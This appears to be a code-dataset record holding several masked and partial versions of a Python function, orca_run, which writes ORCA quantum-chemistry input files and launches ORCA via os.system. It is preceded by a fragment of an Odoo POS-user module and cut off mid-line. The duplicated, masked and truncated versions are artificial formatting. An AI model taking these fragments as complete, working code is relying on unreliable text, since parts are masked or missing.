super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-5": "from odoo import api, tools, fields, models, _\nimport base64\nfrom odoo import modules\n\n\nclass InheritUser(models.Model):\n _inherit = 'pos.config'\n\n related_pos_user = fields.One2many('pos.session.users', 'pos_config', string='Related User')\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n\n pos_sessions = fields.Many2many('pos.config', string='Point of Sale Accessible')\n\n \n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env[\"pos.session.users\"].search(\n [('user', '=', self.id)]).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config': pos_session, 'user': self.id})\n else:\n self.env[\"pos.session.users\"].search(\n [('user', '=', self.id)]).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config': pos_session, 'user': create_id.id})\n return create_id\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def orca_run(method, basis, optfreq, custombasis, correlated, values,
charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open('input.com', 'w') as com_f:
if optfreq == 'true':
if values['verticalIP'] != 'true' or values['IPss'] != 'true':
if values['MGGA'] == 'true':
Freqstr = 'NumFreq'
else:
Freqstr = 'Freq'
if custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + values[
'String_Opt'] + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) +
' ' + values['String_Opt'] + ' ' + Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +
Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' \n')
Nat = len(sym)
com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\n')
for tmp in range(Nat):
R_x = float(R_coord[tmp][0])
R_y = float(R_coord[tmp][1])
R_z = float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],
R_x, R_y, R_z))
com_f.write('*\n')
com_f.write('%MaxCore ' + values['maxcore_mb'] + '\n')
com_f.write('%scf\n MaxIter 500 \n')
com_f.write(' Convergence ' + values['conv_scf'] + '\n')
com_f.write('end\n')
if values['switch_guess'] == 'true':
if values['guess_TM'] == 'true' and values['G4MP2TM']:
com_f.write(' Guess = ' + values['option_guess'] + '\n')
com_f.write('end\n')
if values['switch_load_rel_file'] == 'true':
f1 = open('rel_file.txt', 'r')
com_f.write(f1.read())
f1.close()
with open('Thermochemistry.out', 'a') as ther_chem:
ther_chem.write('check if rel_file.txt exists!!')
if values['SCFDIIS'] == 'true':
com_f.write('%scf\n DIISMaxEq 15\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['LSHIFT'] == 'true':
com_f.write('%scf\n')
com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\n')
com_f.write('end\n')
if values['SOSCF'] == 'true':
com_f.write('%scf\n')
com_f.write(' soscfmaxit 12\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['switch_DLPNO_CCSDT'] == 'true':
com_f.write('%mdci\n')
com_f.write(' UseFullLMP2Guess true\n')
com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\n')
com_f.write('end\n')
if float(values['Ntotale']) <= float(values['nproc']) or float(values
['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']
):
com_f.write('%pal nprocs 1 \n')
else:
com_f.write('%pal nprocs ' + values['nproc'] + ' \n')
com_f.write('end\n')
com_f.write('%method\n')
com_f.write(' IntAcc 7.0\n')
if values['optdiis'] == 'true':
com_f.write(' Z_solver DIIS\n')
com_f.write(' Z_MaxIter 300\n')
if correlated == 'true':
uniq_atom_res = uniqatoms(sym)
if values['ALLELE'] == 'true':
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\n')
else:
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res
) + ' end\n')
com_f.write('end\n')
if optfreq == 'true':
com_f.write('%geom\n')
if values['MGGA'] == 'true':
com_f.write(' Calc_Hess true; NumHess true\n')
else:
com_f.write(' Calc_Hess true\n')
com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \n')
com_f.write('end\n')
com_f.write('%freq Temp 273.15, 298.15\n')
com_f.write('end\n')
if custombasis == 'true':
com_f.write('%basis \n')
if custombasis == 'true':
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res['N_ua'])):
orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])
with open('input.com', 'a') as com_f:
com_f.write('end\n')
os.system(values['orca_exe'] + ' input.com > input.out')
os.system('cat input.com >> ORCA.inp')
os.system('cat input.out >> ORCA.out')
<|reserved_special_token_1|>
import os, sys, string
import linecache, math
import numpy as np
import datetime, time
from pople import NFC
from pople import uniqatoms
from pople import orca_printbas
def orca_run(method, basis, optfreq, custombasis, correlated, values,
charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open('input.com', 'w') as com_f:
if optfreq == 'true':
if values['verticalIP'] != 'true' or values['IPss'] != 'true':
if values['MGGA'] == 'true':
Freqstr = 'NumFreq'
else:
Freqstr = 'Freq'
if custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + values[
'String_Opt'] + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) +
' ' + values['String_Opt'] + ' ' + Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' ' + Freqstr + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +
Freqstr + ' \n')
elif custombasis == 'true':
com_f.write('! ' + str(method) + ' \n')
else:
com_f.write('! ' + str(method) + ' ' + str(basis) + ' \n')
Nat = len(sym)
com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\n')
for tmp in range(Nat):
R_x = float(R_coord[tmp][0])
R_y = float(R_coord[tmp][1])
R_z = float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],
R_x, R_y, R_z))
com_f.write('*\n')
com_f.write('%MaxCore ' + values['maxcore_mb'] + '\n')
com_f.write('%scf\n MaxIter 500 \n')
com_f.write(' Convergence ' + values['conv_scf'] + '\n')
com_f.write('end\n')
if values['switch_guess'] == 'true':
if values['guess_TM'] == 'true' and values['G4MP2TM']:
com_f.write(' Guess = ' + values['option_guess'] + '\n')
com_f.write('end\n')
if values['switch_load_rel_file'] == 'true':
f1 = open('rel_file.txt', 'r')
com_f.write(f1.read())
f1.close()
with open('Thermochemistry.out', 'a') as ther_chem:
ther_chem.write('check if rel_file.txt exists!!')
if values['SCFDIIS'] == 'true':
com_f.write('%scf\n DIISMaxEq 15\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['LSHIFT'] == 'true':
com_f.write('%scf\n')
com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\n')
com_f.write('end\n')
if values['SOSCF'] == 'true':
com_f.write('%scf\n')
com_f.write(' soscfmaxit 12\n')
com_f.write(' directresetfreq 1\n')
com_f.write('end\n')
if values['switch_DLPNO_CCSDT'] == 'true':
com_f.write('%mdci\n')
com_f.write(' UseFullLMP2Guess true\n')
com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\n')
com_f.write('end\n')
if float(values['Ntotale']) <= float(values['nproc']) or float(values
['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']
):
com_f.write('%pal nprocs 1 \n')
else:
com_f.write('%pal nprocs ' + values['nproc'] + ' \n')
com_f.write('end\n')
com_f.write('%method\n')
com_f.write(' IntAcc 7.0\n')
if values['optdiis'] == 'true':
com_f.write(' Z_solver DIIS\n')
com_f.write(' Z_MaxIter 300\n')
if correlated == 'true':
uniq_atom_res = uniqatoms(sym)
if values['ALLELE'] == 'true':
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\n')
else:
for iat in range(int(uniq_atom_res['N_ua'])):
pre1 = uniq_atom_res['uniq_sym']
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res
) + ' end\n')
com_f.write('end\n')
if optfreq == 'true':
com_f.write('%geom\n')
if values['MGGA'] == 'true':
com_f.write(' Calc_Hess true; NumHess true\n')
else:
com_f.write(' Calc_Hess true\n')
com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \n')
com_f.write('end\n')
com_f.write('%freq Temp 273.15, 298.15\n')
com_f.write('end\n')
if custombasis == 'true':
com_f.write('%basis \n')
if custombasis == 'true':
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res['N_ua'])):
orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])
with open('input.com', 'a') as com_f:
com_f.write('end\n')
os.system(values['orca_exe'] + ' input.com > input.out')
os.system('cat input.com >> ORCA.inp')
os.system('cat input.out >> ORCA.out')
<|reserved_special_token_1|>
import os, sys, string
import linecache, math
import numpy as np
import datetime , time
from pople import NFC
from pople import uniqatoms
from pople import orca_printbas
####### orca_run - S
def orca_run(method, basis,optfreq,custombasis, correlated, values, charge, multip, sym, R_coord):
"""
Runs orca
Parameters:
method (char) : Name of functional to be used
basis (char) : Basis set name
optfreq (char) : true/false value of the optfreq keyword
custombasis (char) : true/false value of the custombasis keyword
correlated (char) : true/false value of the correlated keyword
values (dict): Values of the control variables
"""
with open("input.com", "w") as com_f:
if optfreq == "true":
if values["verticalIP"] != "true" or values["IPss"] != "true": # IPss not defined
if values["MGGA"] == "true":
Freqstr="NumFreq"
else:
Freqstr="Freq"
if custombasis == "true":
com_f.write("! " +str(method) + " " + values["String_Opt"] + " " + Freqstr + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) +" "+values["String_Opt"] + " " + Freqstr + " \n")
else:
if custombasis == "true":
com_f.write("! " +str(method) + " " + Freqstr + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) + " " + Freqstr + " \n")
else:
if custombasis == "true":
com_f.write("! " +str(method) + " \n")
else:
com_f.write("! " +str(method) + " " + str(basis) + " \n")
Nat=len(sym)
com_f.write("*xyz "+str(charge)+" "+str(multip) + "\n")
for tmp in range(Nat):
R_x=float(R_coord[tmp][0])
R_y=float(R_coord[tmp][1])
R_z=float(R_coord[tmp][2])
com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\n'.format(sym[tmp],R_x,R_y,R_z))
com_f.write("*\n")
com_f.write("%MaxCore " + values["maxcore_mb"] + "\n")
com_f.write("%scf\n MaxIter 500 \n")
com_f.write(" Convergence " + values["conv_scf"] + "\n")
com_f.write("end\n")
if values["switch_guess"] == "true": ### this is not part of the inp file!!!
if values["guess_TM"] == "true" and values["G4MP2TM"]:
com_f.write(" Guess = " + values["option_guess"] + "\n")
com_f.write("end\n")
if values["switch_load_rel_file"] == "true":
f1 = open("rel_file.txt", "r")
com_f.write(f1.read())
f1.close()
with open("Thermochemistry.out", "a") as ther_chem:
ther_chem.write("check if rel_file.txt exists!!")
if values["SCFDIIS"] == "true":
com_f.write("%scf\n DIISMaxEq 15\n")
com_f.write(" directresetfreq 1\n")
com_f.write("end\n")
if values["LSHIFT"] == "true":
com_f.write("%scf\n")
com_f.write(" Shift Shift 0.1 ErrOff 0.1 end\n")
com_f.write("end\n")
if values["SOSCF"] == "true":
com_f.write("%scf\n")
com_f.write(" soscfmaxit 12\n")
com_f.write(" directresetfreq 1\n")
com_f.write("end\n")
if values["switch_DLPNO_CCSDT"] == "true":
com_f.write("%mdci\n")
com_f.write(" UseFullLMP2Guess true\n")
com_f.write(" TcutDOPre = " + str(values["TcutDOPre"]) +"\n") #TODO Is this really needed?
com_f.write("end\n")
if ( float(values["Ntotale"]) <= float(values["nproc"]) ) or ( (float(values["Ntotale"])-float(values["Ntotalecore"])) < float(values["nproc"]) ):
com_f.write("%pal nprocs 1 \n")
else:
com_f.write("%pal nprocs "+values["nproc"]+" \n")
com_f.write("end\n")
com_f.write("%method\n") ## CHECK
com_f.write(" IntAcc 7.0\n")
if values["optdiis"] == "true":
com_f.write(" Z_solver DIIS\n")
com_f.write(" Z_MaxIter 300\n")
if correlated == "true":
uniq_atom_res = uniqatoms(sym)
if values["ALLELE"] == "true": ### CHECK!!!!
for iat in range(int(uniq_atom_res["N_ua"])):
pre1 = uniq_atom_res["uniq_sym"]
at_pr1 = pre1[iat]
com_f.write(" NewNCore " + at_pr1 + " " + " 0 end\n")
else:
for iat in range(int(uniq_atom_res["N_ua"])):
pre1 = uniq_atom_res["uniq_sym"]
at_pr1 = pre1[iat]
NFC_res = NFC(at_pr1)
com_f.write(" NewNCore " + at_pr1 + " " + str(NFC_res) +" end\n")
com_f.write("end\n")
if optfreq == "true":
com_f.write("%geom\n")
if values["MGGA"] == "true":
com_f.write(" Calc_Hess true; NumHess true\n")
else:
com_f.write(" Calc_Hess true\n")
com_f.write(" Recalc_Hess " + str(values["iterhess"]) +" \n") ## revisit !!!! CHECK!!! IMPORTANT
com_f.write("end\n")
com_f.write("%freq Temp 273.15, 298.15\n")
com_f.write("end\n")
if custombasis == "true":
com_f.write("%basis \n")
if custombasis == "true":
uniq_atom_res = uniqatoms(sym)
fname = basis
if Nat == 1:
orca_printbas(fname, sym[0])
else:
for iat1 in range(int(uniq_atom_res["N_ua"])):
orca_printbas(fname, uniq_atom_res["uniq_sym"][iat1]) # GTBAS1 C
with open("input.com", "a") as com_f:
com_f.write("end\n")
os.system(values["orca_exe"] + " input.com > input.out")
os.system("cat input.com >> ORCA.inp")
os.system("cat input.out >> ORCA.out")
#os.system("rm -f input*")
####### orca_run - E
|
flexible
|
{
"blob_id": "019e8d7159fe07adc245e6476ac1fed5e9c457b5",
"index": 3035,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef orca_run(method, basis, optfreq, custombasis, correlated, values,\n charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open('input.com', 'w') as com_f:\n if optfreq == 'true':\n if values['verticalIP'] != 'true' or values['IPss'] != 'true':\n if values['MGGA'] == 'true':\n Freqstr = 'NumFreq'\n else:\n Freqstr = 'Freq'\n if custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + values[\n 'String_Opt'] + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) +\n ' ' + values['String_Opt'] + ' ' + Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +\n Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' \\n')\n else:\n com_f.write('! 
' + str(method) + ' ' + str(basis) + ' \\n')\n Nat = len(sym)\n com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\\n')\n for tmp in range(Nat):\n R_x = float(R_coord[tmp][0])\n R_y = float(R_coord[tmp][1])\n R_z = float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],\n R_x, R_y, R_z))\n com_f.write('*\\n')\n com_f.write('%MaxCore ' + values['maxcore_mb'] + '\\n')\n com_f.write('%scf\\n MaxIter 500 \\n')\n com_f.write(' Convergence ' + values['conv_scf'] + '\\n')\n com_f.write('end\\n')\n if values['switch_guess'] == 'true':\n if values['guess_TM'] == 'true' and values['G4MP2TM']:\n com_f.write(' Guess = ' + values['option_guess'] + '\\n')\n com_f.write('end\\n')\n if values['switch_load_rel_file'] == 'true':\n f1 = open('rel_file.txt', 'r')\n com_f.write(f1.read())\n f1.close()\n with open('Thermochemistry.out', 'a') as ther_chem:\n ther_chem.write('check if rel_file.txt exists!!')\n if values['SCFDIIS'] == 'true':\n com_f.write('%scf\\n DIISMaxEq 15\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['LSHIFT'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\\n')\n com_f.write('end\\n')\n if values['SOSCF'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' soscfmaxit 12\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['switch_DLPNO_CCSDT'] == 'true':\n com_f.write('%mdci\\n')\n com_f.write(' UseFullLMP2Guess true\\n')\n com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\\n')\n com_f.write('end\\n')\n if float(values['Ntotale']) <= float(values['nproc']) or float(values\n ['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']\n ):\n com_f.write('%pal nprocs 1 \\n')\n else:\n com_f.write('%pal nprocs ' + values['nproc'] + ' \\n')\n com_f.write('end\\n')\n com_f.write('%method\\n')\n com_f.write(' IntAcc 7.0\\n')\n if values['optdiis'] == 'true':\n com_f.write(' Z_solver DIIS\\n')\n com_f.write(' Z_MaxIter 
300\\n')\n if correlated == 'true':\n uniq_atom_res = uniqatoms(sym)\n if values['ALLELE'] == 'true':\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\\n')\n else:\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res\n ) + ' end\\n')\n com_f.write('end\\n')\n if optfreq == 'true':\n com_f.write('%geom\\n')\n if values['MGGA'] == 'true':\n com_f.write(' Calc_Hess true; NumHess true\\n')\n else:\n com_f.write(' Calc_Hess true\\n')\n com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \\n')\n com_f.write('end\\n')\n com_f.write('%freq Temp 273.15, 298.15\\n')\n com_f.write('end\\n')\n if custombasis == 'true':\n com_f.write('%basis \\n')\n if custombasis == 'true':\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1:\n orca_printbas(fname, sym[0])\n else:\n for iat1 in range(int(uniq_atom_res['N_ua'])):\n orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])\n with open('input.com', 'a') as com_f:\n com_f.write('end\\n')\n os.system(values['orca_exe'] + ' input.com > input.out')\n os.system('cat input.com >> ORCA.inp')\n os.system('cat input.out >> ORCA.out')\n",
"step-3": "import os, sys, string\nimport linecache, math\nimport numpy as np\nimport datetime, time\nfrom pople import NFC\nfrom pople import uniqatoms\nfrom pople import orca_printbas\n\n\ndef orca_run(method, basis, optfreq, custombasis, correlated, values,\n charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open('input.com', 'w') as com_f:\n if optfreq == 'true':\n if values['verticalIP'] != 'true' or values['IPss'] != 'true':\n if values['MGGA'] == 'true':\n Freqstr = 'NumFreq'\n else:\n Freqstr = 'Freq'\n if custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + values[\n 'String_Opt'] + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) +\n ' ' + values['String_Opt'] + ' ' + Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' ' + Freqstr + ' \\n')\n else:\n com_f.write('! ' + str(method) + ' ' + str(basis) + ' ' +\n Freqstr + ' \\n')\n elif custombasis == 'true':\n com_f.write('! ' + str(method) + ' \\n')\n else:\n com_f.write('! 
' + str(method) + ' ' + str(basis) + ' \\n')\n Nat = len(sym)\n com_f.write('*xyz ' + str(charge) + ' ' + str(multip) + '\\n')\n for tmp in range(Nat):\n R_x = float(R_coord[tmp][0])\n R_y = float(R_coord[tmp][1])\n R_z = float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],\n R_x, R_y, R_z))\n com_f.write('*\\n')\n com_f.write('%MaxCore ' + values['maxcore_mb'] + '\\n')\n com_f.write('%scf\\n MaxIter 500 \\n')\n com_f.write(' Convergence ' + values['conv_scf'] + '\\n')\n com_f.write('end\\n')\n if values['switch_guess'] == 'true':\n if values['guess_TM'] == 'true' and values['G4MP2TM']:\n com_f.write(' Guess = ' + values['option_guess'] + '\\n')\n com_f.write('end\\n')\n if values['switch_load_rel_file'] == 'true':\n f1 = open('rel_file.txt', 'r')\n com_f.write(f1.read())\n f1.close()\n with open('Thermochemistry.out', 'a') as ther_chem:\n ther_chem.write('check if rel_file.txt exists!!')\n if values['SCFDIIS'] == 'true':\n com_f.write('%scf\\n DIISMaxEq 15\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['LSHIFT'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' Shift Shift 0.1 ErrOff 0.1 end\\n')\n com_f.write('end\\n')\n if values['SOSCF'] == 'true':\n com_f.write('%scf\\n')\n com_f.write(' soscfmaxit 12\\n')\n com_f.write(' directresetfreq 1\\n')\n com_f.write('end\\n')\n if values['switch_DLPNO_CCSDT'] == 'true':\n com_f.write('%mdci\\n')\n com_f.write(' UseFullLMP2Guess true\\n')\n com_f.write(' TcutDOPre = ' + str(values['TcutDOPre']) + '\\n')\n com_f.write('end\\n')\n if float(values['Ntotale']) <= float(values['nproc']) or float(values\n ['Ntotale']) - float(values['Ntotalecore']) < float(values['nproc']\n ):\n com_f.write('%pal nprocs 1 \\n')\n else:\n com_f.write('%pal nprocs ' + values['nproc'] + ' \\n')\n com_f.write('end\\n')\n com_f.write('%method\\n')\n com_f.write(' IntAcc 7.0\\n')\n if values['optdiis'] == 'true':\n com_f.write(' Z_solver DIIS\\n')\n com_f.write(' Z_MaxIter 
300\\n')\n if correlated == 'true':\n uniq_atom_res = uniqatoms(sym)\n if values['ALLELE'] == 'true':\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n com_f.write(' NewNCore ' + at_pr1 + ' ' + ' 0 end\\n')\n else:\n for iat in range(int(uniq_atom_res['N_ua'])):\n pre1 = uniq_atom_res['uniq_sym']\n at_pr1 = pre1[iat]\n NFC_res = NFC(at_pr1)\n com_f.write(' NewNCore ' + at_pr1 + ' ' + str(NFC_res\n ) + ' end\\n')\n com_f.write('end\\n')\n if optfreq == 'true':\n com_f.write('%geom\\n')\n if values['MGGA'] == 'true':\n com_f.write(' Calc_Hess true; NumHess true\\n')\n else:\n com_f.write(' Calc_Hess true\\n')\n com_f.write(' Recalc_Hess ' + str(values['iterhess']) + ' \\n')\n com_f.write('end\\n')\n com_f.write('%freq Temp 273.15, 298.15\\n')\n com_f.write('end\\n')\n if custombasis == 'true':\n com_f.write('%basis \\n')\n if custombasis == 'true':\n uniq_atom_res = uniqatoms(sym)\n fname = basis\n if Nat == 1:\n orca_printbas(fname, sym[0])\n else:\n for iat1 in range(int(uniq_atom_res['N_ua'])):\n orca_printbas(fname, uniq_atom_res['uniq_sym'][iat1])\n with open('input.com', 'a') as com_f:\n com_f.write('end\\n')\n os.system(values['orca_exe'] + ' input.com > input.out')\n os.system('cat input.com >> ORCA.inp')\n os.system('cat input.out >> ORCA.out')\n",
"step-4": "import os, sys, string\nimport linecache, math\nimport numpy as np\nimport datetime , time\n\n\nfrom pople import NFC\nfrom pople import uniqatoms\nfrom pople import orca_printbas\n\n\n####### orca_run - S\ndef orca_run(method, basis,optfreq,custombasis, correlated, values, charge, multip, sym, R_coord):\n \"\"\"\n Runs orca\n\n Parameters:\n method (char) : Name of functional to be used\n basis (char) : Basis set name\n optfreq (char) : true/false value of the optfreq keyword \n custombasis (char) : true/false value of the custombasis keyword\n correlated (char) : true/false value of the correlated keyword \n values (dict): Values of the control variables \n\n \"\"\"\n with open(\"input.com\", \"w\") as com_f:\n if optfreq == \"true\":\n if values[\"verticalIP\"] != \"true\" or values[\"IPss\"] != \"true\": # IPss not defined\n if values[\"MGGA\"] == \"true\":\n Freqstr=\"NumFreq\"\n else:\n Freqstr=\"Freq\"\n \n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \" + values[\"String_Opt\"] + \" \" + Freqstr + \" \\n\")\n else:\n com_f.write(\"! \" +str(method) + \" \" + str(basis) +\" \"+values[\"String_Opt\"] + \" \" + Freqstr + \" \\n\")\n else:\n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \" + Freqstr + \" \\n\")\n else:\n com_f.write(\"! \" +str(method) + \" \" + str(basis) + \" \" + Freqstr + \" \\n\")\n else:\n if custombasis == \"true\":\n com_f.write(\"! \" +str(method) + \" \\n\")\n else:\n com_f.write(\"! 
\" +str(method) + \" \" + str(basis) + \" \\n\")\n\n Nat=len(sym)\n com_f.write(\"*xyz \"+str(charge)+\" \"+str(multip) + \"\\n\")\n for tmp in range(Nat):\n R_x=float(R_coord[tmp][0])\n R_y=float(R_coord[tmp][1])\n R_z=float(R_coord[tmp][2])\n com_f.write(' {:2s}{:15.8f}{:15.8f}{:15.8f}\\n'.format(sym[tmp],R_x,R_y,R_z)) \n com_f.write(\"*\\n\")\n\n com_f.write(\"%MaxCore \" + values[\"maxcore_mb\"] + \"\\n\")\n com_f.write(\"%scf\\n MaxIter 500 \\n\")\n com_f.write(\" Convergence \" + values[\"conv_scf\"] + \"\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"switch_guess\"] == \"true\": ### this is not part of the inp file!!!\n if values[\"guess_TM\"] == \"true\" and values[\"G4MP2TM\"]:\n com_f.write(\" Guess = \" + values[\"option_guess\"] + \"\\n\")\n com_f.write(\"end\\n\")\n \n if values[\"switch_load_rel_file\"] == \"true\":\n f1 = open(\"rel_file.txt\", \"r\")\n com_f.write(f1.read())\n f1.close()\n with open(\"Thermochemistry.out\", \"a\") as ther_chem:\n ther_chem.write(\"check if rel_file.txt exists!!\")\n\n if values[\"SCFDIIS\"] == \"true\":\n com_f.write(\"%scf\\n DIISMaxEq 15\\n\")\n com_f.write(\" directresetfreq 1\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"LSHIFT\"] == \"true\":\n com_f.write(\"%scf\\n\")\n com_f.write(\" Shift Shift 0.1 ErrOff 0.1 end\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"SOSCF\"] == \"true\":\n com_f.write(\"%scf\\n\")\n com_f.write(\" soscfmaxit 12\\n\")\n com_f.write(\" directresetfreq 1\\n\")\n com_f.write(\"end\\n\")\n\n if values[\"switch_DLPNO_CCSDT\"] == \"true\":\n com_f.write(\"%mdci\\n\")\n com_f.write(\" UseFullLMP2Guess true\\n\")\n com_f.write(\" TcutDOPre = \" + str(values[\"TcutDOPre\"]) +\"\\n\") #TODO Is this really needed?\n com_f.write(\"end\\n\")\n\n if ( float(values[\"Ntotale\"]) <= float(values[\"nproc\"]) ) or ( (float(values[\"Ntotale\"])-float(values[\"Ntotalecore\"])) < float(values[\"nproc\"]) ):\n com_f.write(\"%pal nprocs 1 \\n\")\n else:\n com_f.write(\"%pal nprocs 
